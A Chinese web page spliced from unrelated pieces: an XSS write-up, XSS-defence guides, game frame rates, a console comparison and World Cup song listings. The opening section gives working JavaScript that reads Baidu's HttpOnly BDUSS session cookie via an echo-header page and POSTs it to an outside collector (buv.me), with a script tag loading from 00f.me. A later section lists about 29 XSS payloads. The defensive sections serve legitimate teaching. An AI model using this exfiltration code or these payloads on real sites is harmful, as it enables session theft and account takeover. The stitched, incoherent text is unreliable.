如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = 'http://buv.me/index.php?do=apiid={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "http://appstest.baidu.com/http/echoheader.php", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 http://appstest.baidu.com/ 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 http://wooyun.org/bugs/wooyun-2014-051026/trace/e80c9b4ecb9c252d6bdfdb21c335164d 中有提到, http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=http://00f.me/XbSWCk/script
哪有放XSS跨站脚本工具的第三方工具/
不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击
网站要怎么防范常见的XSS跨站式脚本攻击呢,我们先从XSS跨站式脚本攻击的原理来说起。
网站遭受XSS跨站式脚本攻击的基本原理
1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。
其攻击过程如下所示:
A给B发送一个恶意构造了Web的URL。
B点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。
具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。
A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。
2反射式漏洞,这种漏洞和本地利用漏洞有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
其攻击过程如下:
A经常浏览某个网站,此网站为B所拥有。B的站点运行A使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。
C发现B的站点包含反射性的XSS漏洞。
C编写一个利用漏洞的URL,并将其冒充为来自B的邮件发送给A。
A在登录到B的站点后,浏览C提供的URL。
嵌入到URL中的恶意脚本在A的浏览器中执行,就像它直接来自B的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在A完全不知情的情况下将这些信息发送到C的Web站点。
3存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
其攻击过程如下:
B拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。
C注意到B的站点具有存储式的XXS漏洞。
C发布一个热点信息,吸引其它用户纷纷阅读。
B或者是任何的其他人如A浏览该信息,其会话cookies或者其它信息将被C盗走。
类型A直接威胁用户个体,而类型B和存储式漏洞所威胁的对象都是企业级Web应用。
网站遭受XSS跨站式脚本攻击的基本方式
1. DOM-based cross-site scripting
页面本身包含一些DOM对象的操作,如果未对输入的参数进行处理,可能会导致执行恶意脚本。如下面一些DOM操作:
document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
举个例子,假如某个脆弱的页面的代码如下:
HTML
TITLEWelcome!/TITLE
Hi
SCRIPT
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
/SCRIPT
BR
Welcome to our system
…
/HTML
攻击者使用如下的URL访问时,则非常危险:
http://www.vulnerable.site/welcome.html?name=scriptalert(document.cookie)/script
试了一下,貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码,阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊,比如把上面的页面修改一下,安全性就增强了不少:
SCRIPT
var pos=document.URL.indexOf("name=")+5;
var name=document.URL.substring(pos,document.URL.length);
if (name.match(/^[a-zA-Z0-9]$/))
{
document.write(name);
}
else
{
window.alert("Security error");
}
/SCRIPT
2. Reflected cross-site scripting
也被称为None-Persistent cross-site scripting,即,非持久化的XSS攻击,是我们通常所说的,也是最常用,使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL,当 URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接菜能引起。
3. Persistent cross-site scripting
持久化XSS攻击,指的是恶意脚本代码被存储进被攻击的数据库,当其他用户正常浏览网页时,站点从数据库中读取了非法用户存入非法数据,恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。
实施方式
我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX,发现参数XXX原样的出现在了页面源码中:
1. input type="text" class="b6a1-dfbd-eddd-ef35 Seach" name="w" value="XXX" /
OK,可以开始做文章了,我们将XXX替换为:abc"/scriptalert('haha')/scripta href=",返回的HTML代码如下:
1. input type="text" class="dfbd-eddd-ef35-37bf Seach" name="w" value="abc"/
2. scriptalert('haha')/script!--" /
这样,scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为:
1. IMG SRC="javascript:alert('XSS');"
2. IMG SRC=javascript:alert('XSS')
3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"
4. IMG SRC="jav ascript:alert('XSS');"
5. SCRIPT/XSS SRC="http://example.com/xss.js"/SCRIPT
6. SCRIPTalert("XSS");///SCRIPT
7. iframe src=http://example.com/scriptlet.html
8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"
9. BODY BACKGROUND="javascript:alert('XSS')"
10. BODY ONLOAD=alert(document.cookie)
11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")
12. IMG DYNSRC="javascript:alert('XSS')"
13. IMG DYNSRC="javascript:alert('XSS')"
14. BR SIZE="{alert('XSS')}"
15. IMG SRC='vbscript:msgbox("XSS")'
16. TABLE BACKGROUND="javascript:alert('XSS')"
17. DIV STYLE="width: expression(alert('XSS'));"
18. DIV STYLE="background-image: url(javascript:alert('XSS'))"
19. STYLE TYPE="text/javascript"alert('XSS');/STYLE
20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE
21. ?='SCRIPTalert("XSS")/SCRIPT'?
22. A HREF="javascript:document.location='http://www.example.com/'"XSS/A
23. IMG SRC=javascript:alert('XSS')
24. EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"/EMBED
25. a="get";
26. b="URL(""";
27. c="javascript:";
28. d="alert('XSS');"")";
29. eval(a+b+c+d);
总结一下,要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些javascript关键字和一些敏感的字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用encode编码。
用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。
准备工作:先去www.iisutm.com下载最新的IISUTM版本。
根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来,这里需要注意的是使用Windows 2003+iis6的服务器,需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。
安装完成,通过浏览器访问IISUTM的配置管理界面默认的是http://127.0.0.1:8362,这个是私有地址,只能在该服务器上访问,你需要任何地方都能访问的话,可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址,和你所开放的端口。这样你就可以通过你配置的地址进行访问,或者你可以在iis中直接管理名为IISUTM的站点。
登陆管理界面后点击上面导航栏中的“基本设置”,然后点击左边菜单的“防XSS攻击”链接。
开启该链接里所有的选项,选中之后IISUTM会自动保存配置,下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库,你可以根据你网站的情况进行更改(最好不要修改)。
确认以上的配置以后,你可以返回到IISUTM管理界面的首页,这里会列出最近服务器遭受到的攻击以及详细,赶紧去看看你的网站是不是随时有人在进行SQL注入吧,以及哪些攻击被IISUTM处理掉了。
荒野大镖客2xss帧数
如下。
Enlisted:2560x1440、60帧
MotoGP21: 2560x1440、60帧
异形战机最终2: 3840x2160、60帧
质量效应传奇版 品质模式:3840x2160、30帧
质量效应传奇版 性能模式:2560x1440、60帧
灰烬重生 品质模式:3840x2160、30帧
灰烬重生 性能模式:1920x1080、60帧
孤岛危机重制版 品质模式:3840x2160、30帧
孤岛危机重制版 性能模式:1920x1080、60帧
孤岛危机重制版 光追模式:1920x1080、30帧
漫威复仇者联盟 品质模式:2560x1440、30帧
漫威复仇者联盟 性能模式:1920x1080、60帧。
xss和switch大小
大小的话两者差不多。
?1.入手xss的主要原因是想体验地平线系列2.第二个原因是XGP真香,首月10港币白嫖地平线4和5,还有FIFA21,至于枪战类还没有下载。switch的游戏都不便宜,大多推荐入手实体卡玩完可以回血,但对比XGP某宝300至600不等金额能获得3年会员服务,是真的划算,无论是轻度玩家还是重度玩家都合适,我属于轻度玩家,可能就周末开开机,可以体验很多款游戏,春节期间略爽了一下。要是换成switch的话也要压很多资金在买实体卡上,备两三款游戏是必须的吧,大几百压着呢~
?
求各届世界杯主题曲!!
1986
别样的英雄“A Special Kind of Hero
mms://media.chinabroadcast.cn/chi/sports/sq060307003.wma
下载
演唱者:斯黛芬妮.劳伦斯(Stephanie Lawrence)
1986年的世界杯是属于马拉多纳的,这位阿根廷天皇巨星以“上帝之手”和连过五人的长途奔袭进球得分,闻名于世,并为本队再次夺得世界杯桂冠。这首充满传统色彩的大气歌曲后来一直被视为颂扬马拉多纳的赞歌,究其原因是它曾出现在那届世界杯赛官方影片《英雄》的结尾,而画面恰恰是马拉多纳在球场上英武拼杀的慢动作镜头。此歌演唱者是著名的舞台剧演员斯黛芬妮-劳伦斯,但该曲是否为当届主题曲,还鲜有明证。
斯黛芬妮.劳伦斯
出生于英国的音乐家庭,父母从事音乐和舞蹈。她因在伦敦一些最著名的音乐剧中出演而知名。16岁登上舞台后,不久去百老汇发展,也在电影和电视中客串角色。自1981年接任安德鲁-韦伯的名剧《埃薇塔》(又名:贝隆夫人Evita)起,她陆续出演了《玛莉莲》(Marilyn!)、《星光快车》(Starlight Express)、《猫》(Cats)的主角。1993年因主演《热血兄弟》(Blood Brother)而获得托尼奖提名,她1989年曾出演电影版的《歌剧院魅影》。2000年11月4日在伦敦寓所过世,享年50岁。
1990
“意大利之夏” (UN'ESTATE ITALIANA)
http://www.96011.com/mp3/Goalmp3/20051202204820571.mp3下载
演唱者:吉奥吉.莫罗德(Giorgio Moroder)和吉娜.娜尼尼(Gianna Nannini)
“意大利之夏”或许是最成功的世界杯主题曲,至今仍被资深球迷和歌迷所津津乐道。这是首悠扬动听,又振奋人心的歌曲,意大利人将亚平宁半岛上的海风和足球王国对足球运动的理解糅合成迷人的音乐。这首歌有数个版本,原唱录音版较舒缓传统;现场演唱版则加入更多摇滚节奏;因为作曲的是意大利电子乐大师吉奥吉,也有过节奏强劲的混音版。超级球迷香港天王谭咏麟也曾将此歌改成粤语版本的“理想与和平”。两位原唱者都是意大利最著名的流行乐大师,并且此歌也是两人合作写成的,英语版由吉奥吉演唱。
吉奥吉.莫罗德
意大利最著名的电子音乐先锋,是20世纪70年代迪斯科音乐发展中的标志人物。这位1940年4月26日生于奥提西的意大利人,曾经赢得过3座奥斯卡奖和4次金球奖。他有着传奇式的经历,所涉及的领域几乎都带给他巨大的荣誉。他曾经是位吉他手,19岁组建了自己的乐队Covers,出没于欧洲的夜总会中。70年代起,他专心于音乐制作,1969年他推出自己制作的处女单曲“瞧一瞧”(Looky Looky),并与合作伙伴佩特-贝洛特(Pete Bellotte)组成了制作组合。他们的辉煌来自于发掘了曾经当和声歌手的多娜-桑莫(Donna Summer),由此缔造了一种对迪斯科影响深远的音乐现象。70年代后期,莫罗德开始接触电影配乐。并在整个80年代倾心于此工作。他在电影方面最著名的作品是由汤姆-克鲁斯主演的影片《壮志雄心》的主题曲“带走我的呼吸”(Take my breath away)。该曲不仅雄踞英美各大排行榜之首,并摘得奥斯卡最佳歌曲奖。
吉娜.娜尼尼
吉娜1956年6月14日生于意大利迷人的图斯卡尼省。她从小就显现出音乐天赋,在她身上所蕴涵的自然、反叛和自信使她19岁就离家来到米兰闯荡。1976年,她推出同名首张专辑。1979年她做出冒险决定,只身闯荡美国探询摇滚乐根源。虽然她经历了种种失望,但还是深深地发掘出自己的摇滚根源。经过挫折与努力,吉娜成为世界级明星,频繁在欧洲成功举行巡回演唱会,不断与众多著名音乐人有过合作。1989年她同艾多拉多-班那托合作写词了1990年世界杯赛的主题曲“意大利之夏”的歌词,并与吉奥吉在米兰的开幕式携手歌唱。
1994
“荣耀之地”(Gloryland)
http://www.lanierspeedway.com/gloryland.mp3
下载
演唱者:达利尔.豪(Daryl Hall)
美国一直是足球运动的处女地,把世界杯主办权交到他们手里似乎是个错误的选择,主题曲也变得黯淡。这首“荣耀之地”虽然有个响亮的名字,但是英雄主义色彩在这首歌中荡然无存。“荣耀之地”在音乐风格上更接近于民谣与流行摇滚乐的结合,很有些美国西部荒原的苍茫感。1994年作者兼主唱达利尔创作了此歌,并邀请福音曲演唱组合“黑暗之声”(Sounds of blackness)协助录制。由于作品缺乏对足球运动的共鸣,很快淹没在人们的记忆之中。1994年的世界杯合辑中收录的其他大牌艺人的作品倒是要比主题曲精彩得多。
达利尔.豪
达利尔.豪是美国70和80年代知名组合“豪与奥兹双人组”(Hall and Oates)的成员之一。他1946年10月11日出生,原名Daryl Franklin Hohl。来自费城的达利尔在坦普尔大学结识了后来的伙伴约翰-奥兹(John Oates)。他们几经分合,最后在汤米.莫托拉(Tommy Mottola,后来也是玛莉亚凯莉的经理人)的运作下,签约亚特兰大唱片公司。1972年推出首张专辑《纯粹的奥兹》(Whole Oates)。1984年他们成为历史上排名最高的民谣二人组,同年组合解散,各自发展,1988年为了专辑《Ooh Yeah!》重组。至今他仍有新专辑推出。
另外94年还有一首很流行:我们是冠军
http://www.fifabbs.com/thx/1/10.mp3
下载
1998
“生命之杯”(La Copa De La Vida)
下载
演唱者:瑞奇.马汀(Ricky Martin)
瑞奇.马汀是世界级偶像歌手,并引领着拉丁音乐浪潮。该歌曲选自他1998年专辑《让爱继续》(Vuelve),并获得全球30个国家单曲排行的冠军,也是1998年法国世界杯的另一首主题曲。“生命之杯” 在世界杯之后也传播甚广,成为很多足球节目用来烘托气氛的第一选用曲目。歌曲中的鼓乐节奏和号角奏鸣都颇为煽情。
瑞奇.马汀
瑞奇.马汀1971年12月24日生于波多黎各,6岁起开始接拍电视广告,很快对表演产生浓厚兴趣。12岁时,瑞奇-马汀加入了少年偶像团体Menudo,这是一支拉丁乐历史上最受欢迎的组合。17岁的马汀在离开Menudo后,决定放下明星身份,重新走入学校完成他最后的高中学业。毕业后,他毅然来到美国纽约。以个人姿态进军歌坛的瑞奇-马汀,1991年推出了首张同名专辑,获得巨大成功,并在全球许多国家掀起了一股拉丁乐狂潮。1994年,瑞奇-马汀参演了电视连续剧《急诊室的故事》,这部在美国ABC电视台收视率颇高的肥皂剧使瑞奇的知名度再次得到了空前提高。1996年,让瑞奇-马汀走红全球的专辑《A Medio Vivir》发行,其中收录的歌曲呈现多元化风貌,收录有法国9周冠军曲“Maria”。令瑞奇走向世界的歌曲“生命之杯”(La Copa De La Vida / The Cup Of Life)收录在大碟《Vuelve》中,他以西班牙文唱出火热的气氛。
“我踢球你介意吗”(法语:La Cour des Grands)
http://www.jl2sy.cn/xssq/zqly/w_cup_anthem_98.mp3下载
演唱者:尤索.恩多(Youssou N'Dour )& 阿克塞拉.瑞德(Axelle Red)
“我踢球你介意吗”是首轻快的歌曲,带着浓烈的热带情调和欢快的吟唱风格。演唱者都不是法国人,歌曲没有明显的法国特点,可能也正应和了世界杯融合交流的主题,并符合法国人喜好出人意料的性格。但很多人认为并不好听。
尤索.恩多
尤索-恩多是目前世界乐坛最著名的世界音乐歌手之一,这位嗓音独特的塞内加尔人生于1959年10月。美国著名乐评杂志《滚石》是这样评价他的:“如果有哪位来自第三世界的艺人在全球影响力上能和鲍伯-马里(Bob Marley)相提并论的话,那只有尤索-恩多。他的嗓音独特,古老非洲的历史似乎都凝结在他的声线之中。”
阿克塞拉.瑞德
1968年生于比利时的海塞尔特,3岁起学习舞蹈并接触音乐,从莫扎特到南部灵歌,她都有所涉猎。1983年用英语录制了第一张单曲,因为英语最适合她想唱的这类歌曲。在Virgin唱片的支持下,她继续女性灵歌风格的探索。1993年她的第一张专辑《Sans Plus Attendre》终于为她不仅在比利时,更在法语地区赢得了声誉。1998年6月她同尤索-恩多在世界杯开幕式上向法兰西体育场内8万球迷和全球数亿观众演唱了这首充满欢快节奏和热带韵律的歌曲。
2002
“风暴”(Boom)
http://www.vintion.com.cn/vin2001cn/study/eng-song/Boom.mp3下载
演唱者:阿纳斯塔西娅(Anastacia)
阿纳斯塔西娅的歌声和形象的差距令人难以置信,靓丽的偶像外型和深沉浑厚的“爵士乐”嗓音给人的视听觉冲击强烈。“风暴”曲调简洁、节奏强劲,流行的曲风给人异域感觉,和“生命之杯” 相比它少了些火般热情,多了份紧迫感强劲的冲击。
阿纳斯塔西娅
阿纳斯塔西娅原名Anastacia Newkirk,1973年9月17日出生于美国芝加哥,父亲是酒店歌手,母亲是纽约百老汇的演员。她14岁时父母离异,随母亲来到纽约,并进入艺术学校。阿纳斯塔西娅1999年参加MTV的新秀选拔赛后加入乐坛。签约Sony之后于2000年发行了个人首张专辑《并非它类》(Not That Kind)获得巨大成功,销量逾200万。2002年发行第二张专辑《自然的怪诞》(Freak of Nature),当前的单曲“Paid My Dues”在全球热播不断。阿纳斯塔西娅的演唱和舞蹈风格以随性自由为特点,金发白肤的抢眼外形之下蕴藏的却是一把“拥有纯粹的黑人灵魂的声线”。去年11月1日,国际足联最终确定阿纳斯塔西娅来演唱2002年韩日世界杯主题歌“风暴”。
“足球圣歌”(Anthem)
http://www.fifaworldranking.com/fa2002_2.mp3
下载
演唱者:范吉利斯(Vangelis)
范吉利斯的配乐以华丽见长,我们最熟悉的是将气氛烘托到极致的“火的战车”。这首主题曲中有两个版本,一首电子乐版本的作品是由芬兰音乐家JS16混音完成,兼具东方色彩和电子乐风情。另一首交响乐版传统、大气,作为专辑的结尾恰倒好处。
范吉利斯:当代最成功的电子乐作曲家、新世纪音乐大师。1943年出生于希腊,从小就显露非同一般的音乐才华,然而他拒绝接受钢琴课,并坚持自学成才。1981年荣获奥斯卡电影最佳配乐奖以《火的战车》,从此蜚声国际,电影的主题歌甚至进入美国流行榜十大,其后引发了一系列的电影音乐创作。1992年,范吉利斯获颁法国最富盛誉的艺术文学骑士勋章。他的最新作品是为美国宇航局的“2001火星奥德赛”任务创作的主题音乐“Mythodea”。
2006
Time of Our Lives(我们生命中的时光)
http://kfcs1.56.com/audiomail/st ... _1147801267_713.mp3下载
下载
由Sony BMG唱片公司著名作曲家约尔根·埃洛弗松(Jorgen Elofsson)作曲,超级制作人史蒂夫·麦克(Steve Mac)制作的2006年德国世界杯主题曲“我们生命中的时光”(Time of Our Lives)将在6月9曰慕尼黑的世界杯开幕式上由红遍全球Pop Opera跨界团体Il Divo“美声绅士”组合与RB天后Toni Braxton共同首演。
这首世界杯主题曲是迄今为止感觉最抒情的一首,虽然没有98世界杯瑞奇马丁演唱的那首主题歌劲爆,更没有《意大利之夏》经典,但却不失为一首好歌!
歌词
there was a dream
a long time a ago
there was a dream
destined to grow
into a passion
a fire within
a will to give everything
a desire to win
for the lifetime of heartbreakes
that brought us here today
we'll go all the way
It feels like we're having the time of our lives
Let there be sunshine let it rain
Let's come together as one and the same
Cause it feels like we?re having the time of our lives
We'll find the glory in the end
For all that we are
For all that we are
For the time of our lives
This is the moment
This is our chance
To do what we love and to be
What we're ment to be
for the lifetime of heartbreakes
that brought us here today
we'll go all the way
It feels like we're having the time of our lives
And I'll never forget
For as long as I live
生命之巅
这里有一个梦想
在很久很久以前
这里有一个梦想
不停的向热情蔓延
胸中充满烈火
世界万物都拥有信念
一个愿望就是胜利
为了今天不会带给我们
一生难以忍受的悲伤和失望
我们将一直努力
感觉我们已经拥有了生命之颠
到处都是阳光和雨露
让我们团结成为一体
因为感觉告诉我们
我们已经拥有了生命之颠
我们在最后拥有的最高的荣誉
为了所有的人
为了所有的人
为了我们的生命之颠
就是这片刻
这是我们的机会
去做我们想做的事
那些我们希望的事
为了今天不会带给我们
一生难以忍受的悲伤和失望
我们将一直努力
感觉我们已经拥有了生命之颠
我永远不会忘记
永远不会
望采纳!!
如何正确防御xss攻击
XSS攻击通常是指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。
一、HttpOnly防止劫取Cookie
HttpOnly最早由微软提出,至今已经成为一个标准。浏览器将禁止页面的Javascript访问带有HttpOnly属性的Cookie。目前主流浏览器都支持,HttpOnly解决是XSS后的Cookie支持攻击。
我们来看下百度有没有使用。
未登录时的Cookie信息
可以看到,所有Cookie都没有设置HttpOnly,现在我登录下
发现在个叫BDUSS的Cookie设置了HttpOnly。可以猜测此Cookie用于认证。
下面我用PHP来实现下:
?php
header("Set-Cookie: cookie1=test1;");
header("Set-Cookie: cookie2=test2;httponly",false);
setcookie('cookie3','test3',NULL,NULL,NULL,NULL,false);
setcookie('cookie4','test4',NULL,NULL,NULL,NULL,true);
?
script
alert(document.cookie);
/script
js只能读到没有HttpOnly标识的Cookie
二、输入检查
输入检查一般是检查用户输入的数据中是否包含一些特殊字符,如、、'、"等,如果发现存在特殊字符,则将这些字符过滤或者编码。
例如网站注册经常用户名只允许字母和数字的组合,或者邮箱电话,我们会在前端用js进行检查,但在服务器端代码必须再次检查一次,因为客户端的检查很容易绕过。
网上有许多开源的“XSS Filter”的实现,但是它们应该选择性的使用,因为它们对特殊字符的过滤可能并非数据的本意。比如一款php的lib_filter类:
$filter = new lib_filter();
echo $filter-go('1+11');
它输出的是1,这大大歪曲了数据的语义,因此什么情况应该对哪些字符进行过滤应该适情况而定。
三、输出检查
大多人都知道输入需要做检查,但却忽略了输出检查。
1、在HTML标签中输出
如代码:
?php
$a = "scriptalert(1);/script";
$b = "img src=# onerror=alert(2) /";
?
div?=$b?/div
a href="#"?=$a?/a
这样客户端受到xss攻击,解决方法就是对变量使用htmlEncode,php中的函数是htmlentities
?php
$a = "scriptalert(1);/script";
$b = "img src=# onerror=alert(2) /";
?
div?=htmlentities($b)?/div
a href="#"?=htmlentities($a)?/a
2、在HTML属性中输出
div id="div" name ="$var"/div
这种情况防御也是使用htmlEncode
在owasp-php中实现:
$immune_htmlattr = array(',', '.', '-', '_');
$this-htmlEntityCodec-encode($this-immune_htmlattr, "\"script123123;/script\"");
3、在script标签中输出
如代码:
?php
$c = "1;alert(3)";
?
script type="text/javascript"
var c = ?=$c?;
/script
这样xss又生效了。首先js变量输出一定要在引号内,但是如果我$c = "\"abc;alert(123);//",你会发现放引号中都没用,自带的函数都不能很好的满足。这时只能使用一个更加严格的JavascriptEncode函数来保证安全——除数字、字母外的所有字符,都使用十六进制"\xHH"的方式进行编码。这里我采用开源的owasp-php方法来实现
$immune = array("");
echo $this-javascriptCodec-encode($immune, "\"abc;alert(123);//");
最后输出\x22abc\x3Balert\x28123\x29\x3B\x2F\x2F
4、在事件中输出
a href="#" onclick="funcA('$var')" test/a
可能攻击方法
a href="#" onclick="funcA('');alter(/xss/;//')"test/a
这个其实就是写在script中,所以跟3防御相同
5、在css中输出
在owasp-php中实现:
$immune = array("");
$this-cssCodec-encode($immune, 'background:expression(window.x?0:(alert(/XSS/),window.x=1));');
6、在地址中输出
先确保变量是否是"http"开头,然后再使用js的encodeURI或encodeURIComponent方法。
在owasp-php中实现:
$instance = ESAPI::getEncoder();
$instance-encodeForURL(‘url’);
四、处理富文体
就像我写这篇博客,我几乎可以随意输入任意字符,插入图片,插入代码,还可以设置样式。这个时要做的就是设置好白名单,严格控制标签。能自定义 css件麻烦事,因此最好使用成熟的开源框架来检查。php可以使用htmlpurify
五、防御DOM Based XSS
DOM Based XSS是从javascript中输出数据到HTML页面里。
script
var x = "$var";
document.write("a href='"+x+"'test/a");
/script
按照三中输出检查用到的防御方法,在x赋值时进行编码,但是当document.write输出数据到HTML时,浏览器重新渲染了页面,会将x进行解码,因此这么一来,相当于没有编码,而产生xss。
防御方法:首先,还是应该做输出防御编码的,但后面如果是输出到事件或脚本,则要再做一次javascriptEncode编码,如果是输出到HTML内容或属性,则要做一次HTMLEncode。
会触发DOM Based XSS的地方有很多:
document.write()、document.writeln()、xxx.innerHTML=、xxx.outerHTML=、innerHTML.replace、document.attachEvent()、window.attachEvent()、document.location.replace()、document.location.assign()